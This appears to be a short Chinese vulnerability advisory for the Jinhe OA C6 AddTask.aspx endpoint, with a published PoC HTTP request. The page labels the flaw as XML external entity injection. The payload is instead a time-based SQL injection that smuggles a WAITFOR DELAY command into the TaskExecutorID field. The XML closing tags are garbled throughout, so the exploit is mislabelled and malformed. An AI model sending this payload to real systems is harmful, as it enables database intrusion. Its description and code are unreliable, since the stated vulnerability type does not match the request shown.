金和OA-C6 /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx XML 外部实体注入漏洞

日期: 2025-07-28 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和 /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx 存在 XML 外部实体注入漏洞,攻击者可以通过构造恶意的 XML 请求来利用该漏洞。

PoC代码

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/xml
Connection: close
<root>
<Page>
<PageName>TaskDetect,"PageName>
,"Page>
<StartTime>2023-01-01 00:00:00,"StartTime>
<EndTime>2023-01-01 00:00:00,"EndTime>
<TaskExecutorID>3');WAITFOR DELAY'0:0:5'&" ,"TaskExecutorID>
,"root>

相关漏洞推荐